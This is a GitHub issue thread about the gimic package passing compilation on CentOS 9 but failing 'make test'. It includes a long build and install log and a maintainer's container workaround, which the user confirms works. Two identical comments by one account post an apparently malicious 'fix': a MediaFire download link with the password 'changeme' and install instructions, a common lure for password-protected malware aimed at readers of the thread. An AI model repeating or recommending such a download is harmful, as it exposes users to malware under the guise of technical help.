### ISSUE TITLE
Compilation successes but the test failed

### ISSUE THREAD

**Issue by Runeluna** [qmcurrents/gimic#311]
I tried to install gimic on a centos9 VM and had many problems.

The first was a numpy error when running setup and build/make, which I realized was probably incompatible with numpy2, and was resolved by back to numpy 1.26 and reassigning the directory.

The make seems to be successful, with the following output：
`[root@localhost build]# make
[  2%] Building Fortran object src/libgimic/CMakeFiles/gimic2.dir/kinds.f90.o
[  4%] Building Fortran object src/libgimic/CMakeFiles/gimic2.dir/settings.f90.o
[  7%] Building Fortran object src/libgimic/CMakeFiles/gimic2.dir/teletype.f90.o
[  9%] Building Fortran object src/libgimic/CMakeFiles/gimic2.dir/globals.f90.o
[ 11%] Building Fortran object src/libgimic/CMakeFiles/gimic2.dir/tensor.f90.o
[ 14%] Building Fortran object src/libgimic/CMakeFiles/gimic2.dir/acid.f90.o
[ 16%] Building Fortran object src/libgimic/CMakeFiles/gimic2.dir/gtodefs.f90.o
[ 19%] Building Fortran object src/libgimic/CMakeFiles/gimic2.dir/intgrl.f90.o
[ 21%] Building Fortran object src/libgimic/CMakeFiles/gimic2.dir/basis.f90.o
[ 23%] Building Fortran object src/libgimic/CMakeFiles/gimic2.dir/factorial.f90.o
[ 26%] Building Fortran object src/libgimic/CMakeFiles/gimic2.dir/cao2sao.f90.o
[ 28%] Building Fortran object src/libgimic/CMakeFiles/gimic2.dir/caos.f90.o
[ 30%] Building Fortran object src/libgimic/CMakeFiles/gimic2.dir/bfeval.f90.o
[ 33%] Building Fortran object src/libgimic/CMakeFiles/gimic2.dir/reorder.f90.o
[ 35%] Building Fortran object src/libgimic/CMakeFiles/gimic2.dir/dens.f90.o
[ 38%] Building Fortran object src/libgimic/CMakeFiles/gimic2.dir/gaussint.f90.o
[ 40%] Building Fortran object src/libgimic/CMakeFiles/gimic2.dir/gausspoints.f90.o
[ 42%] Building Fortran object src/libgimic/CMakeFiles/gimic2.dir/jtensor.F90.o
[ 45%] Building Fortran object src/libgimic/CMakeFiles/gimic2.dir/timer.f90.o
[ 47%] Building Fortran object src/libgimic/CMakeFiles/gimic2.dir/gimic_interface.f90.o
[ 50%] Building Fortran object src/libgimic/CMakeFiles/gimic2.dir/lip.f90.o
[ 52%] Building C object src/libgimic/CMakeFiles/gimic2.dir/gausspoints.c.o
[ 54%] Building CXX object src/libgimic/CMakeFiles/gimic2.dir/GimicInterface.cpp.o
[ 57%] Linking CXX static library libgimic2.a
[ 57%] Built target gimic2
[ 59%] Compiling Cython CXX source for gimic...
/usr/local/lib64/python3.9/site-packages/Cython/Compiler/Main.py:369: FutureWarning: Cython directive 'language_level' not set, using 2 for now (Py2). This will change in a later release! File: /root/gimic/src/libgimic/gimic.pxd
  tree = Parsing.p_module(s, pxd, full_module_name)
[ 61%] Building CXX object src/libgimic/CMakeFiles/gimic.dir/gimic.cxx.o
[ 64%] Linking CXX shared module gimic.so
[ 64%] Built target gimic
[ 66%] Compiling Cython C source for gengauss...
/usr/local/lib64/python3.9/site-packages/Cython/Compiler/Main.py:369: FutureWarning: Cython directive 'language_level' not set, using 2 for now (Py2). This will change in a later release! File: /root/gimic/src/libgimic/gengauss.pxd
  tree = Parsing.p_module(s, pxd, full_module_name)
[ 69%] Building C object src/libgimic/CMakeFiles/gengauss.dir/gengauss.c.o
In file included from /usr/local/lib64/python3.9/site-packages/numpy/core/include/numpy/ndarraytypes.h:1929,
                 from /usr/local/lib64/python3.9/site-packages/numpy/core/include/numpy/ndarrayobject.h:12,
                 from /usr/local/lib64/python3.9/site-packages/numpy/core/include/numpy/arrayobject.h:5,
                 from /root/gimic/build/src/libgimic/gengauss.c:753:
/usr/local/lib64/python3.9/site-packages/numpy/core/include/numpy/npy_1_7_deprecated_api.h:17:2: warning：#warning "Using deprecated NumPy API, disable it with " "#define NPY_NO_DEPRECATED_API NPY_1_7_API_VERSION" [-Wcpp]
   17 | #warning "Using deprecated NumPy API, disable it with " \
      |  ^~~~~~~
[ 71%] Linking CXX shared module gengauss.so
[ 71%] Built target gengauss
[ 73%] Compiling Cython C source for connector...
/usr/local/lib64/python3.9/site-packages/Cython/Compiler/Main.py:369: FutureWarning: Cython directive 'language_level' not set, using 2 for now (Py2). This will change in a later release! File: /root/gimic/src/pygimic/connector.pxd
  tree = Parsing.p_module(s, pxd, full_module_name)
[ 76%] Building C object src/pygimic/CMakeFiles/connector.dir/connector.c.o
[ 78%] Linking C shared module connector.so
[ 78%] Built target connector
[ 80%] Building Fortran object src/fgimic/CMakeFiles/gimic.bin.dir/getkw.f90.o
[ 83%] Building Fortran object src/fgimic/CMakeFiles/gimic.bin.dir/grid.f90.o
[ 85%] Building Fortran object src/fgimic/CMakeFiles/gimic.bin.dir/parallel.F90.o
[ 88%] Building Fortran object src/fgimic/CMakeFiles/gimic.bin.dir/vtkplot.f90.o
[ 90%] Building Fortran object src/fgimic/CMakeFiles/gimic.bin.dir/jfield.f90.o
[ 92%] Building Fortran object src/fgimic/CMakeFiles/gimic.bin.dir/magnet.f90.o
[ 95%] Building Fortran object src/fgimic/CMakeFiles/gimic.bin.dir/integral.f90.o
[ 97%] Building Fortran object src/fgimic/CMakeFiles/gimic.bin.dir/gimic.F90.o
[100%] Linking Fortran executable gimic.bin
[100%] Built target gimic.bin
[root@localhost build]# make install
[ 57%] Built target gimic2
[ 64%] Built target gimic
[ 71%] Built target gengauss
[ 78%] Built target connector
[100%] Built target gimic.bin
Install the project...
-- Install configuration: "release"
-- Installing: /root/gimic/build/bin/MOL2mol.sh
-- Installing: /root/gimic/build/bin/qgimic.sh
-- Installing: /root/gimic/build/bin/grd2node.sh
-- Installing: /root/gimic/build/bin/quesys.sh
-- Installing: /root/gimic/build/bin/turbo2gimic.py
-- Installing: /root/gimic/build/bin/sortorbitals.py
-- Installing: /root/gimic/build/bin/unstructured_grid_gen.py
-- Installing: /root/gimic/build/bin/QCTools
-- Installing: /root/gimic/build/bin/QCTools/Atom.py
-- Installing: /root/gimic/build/bin/QCTools/Const.py
-- Installing: /root/gimic/build/bin/QCTools/Elements.py
-- Installing: /root/gimic/build/bin/QCTools/QCTools.py
-- Installing: /root/gimic/build/bin/QCTools/__init__.py
-- Installing: /root/gimic/build/bin/gimic
-- Installing: /root/gimic/build/lib/python/site-packages/gimic/getkw.py
-- Installing: /root/gimic/build/lib/python/site-packages/gimic/pygimic
-- Installing: /root/gimic/build/lib/python/site-packages/gimic/pygimic/atom.py
-- Installing: /root/gimic/build/lib/python/site-packages/gimic/pygimic/atomic_units.py
-- Installing: /root/gimic/build/lib/python/site-packages/gimic/pygimic/currents.py
-- Installing: /root/gimic/build/lib/python/site-packages/gimic/pygimic/elements.py
-- Installing: /root/gimic/build/lib/python/site-packages/gimic/pygimic/field.py
-- Installing: /root/gimic/build/lib/python/site-packages/gimic/pygimic/gimic_exceptions.py
-- Installing: /root/gimic/build/lib/python/site-packages/gimic/pygimic/grid.py
-- Installing: /root/gimic/build/lib/python/site-packages/gimic/pygimic/magnet.py
-- Installing: /root/gimic/build/lib/python/site-packages/gimic/pygimic/molecule.py
-- Installing: /root/gimic/build/lib/python/site-packages/gimic/pygimic/plot.py
-- Installing: /root/gimic/build/lib/python/site-packages/gimic/pygimic/pygimic.py
-- Installing: /root/gimic/build/lib/python/site-packages/gimic/pygimic/quadrature.py
-- Installing: /root/gimic/build/lib/python/site-packages/gimic/pygimic/streamplot.py
-- Installing: /root/gimic/build/lib/python/site-packages/gimic/pygimic/__init__.py
-- Installing: /root/gimic/build/lib/python/site-packages/gimic/london
-- Installing: /root/gimic/build/lib/python/site-packages/gimic/london/current.py
-- Installing: /root/gimic/build/lib/python/site-packages/gimic/london/london.py
-- Installing: /root/gimic/build/lib/python/site-packages/gimic/london/__init__.py
-- Installing: /root/gimic/build/lib/python/site-packages/gimic/gimic.so
-- Installing: /root/gimic/build/lib/python/site-packages/gimic/gengauss.so
-- Installing: /root/gimic/build/lib64/libgimic2.a
-- Installing: /root/gimic/build/include/GimicInterface.h
-- Installing: /root/gimic/build/include/gimic_interface.h
-- Installing: /root/gimic/build/include/gimic.pxd
-- Installing: /root/gimic/build/lib/python/site-packages/gimic/connector.so
-- Installing: /root/gimic/build/lib/python/site-packages/gimic/fgimic/__init__.py
-- Installing: /root/gimic/build/lib/python/site-packages/gimic/fgimic/gimic.py
-- Installing: /root/gimic/build/lib/python/site-packages/gimic/fgimic/getkw.py
-- Installing: /root/gimic/build/bin/gimic.bin
`
But I failed to check it using make test and the failure log is in the attachment.
[LastTest.log](https://github.com/user-attachments/files/16823362/LastTest.log)
Can you help me with that?

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by bast** [comment]
One workaround could be to build a container: https://github.com/qmcurrents/gimic/tree/master/container

(note to self that we should provide ready-built container images that can be run through Apptainer)

**Comment by Runeluna** [comment]
> One workaround could be to build a container: https://github.com/qmcurrents/gimic/tree/master/container
> 
> (note to self that we should provide ready-built container images that can be run through Apptainer)

It works! Thank you!
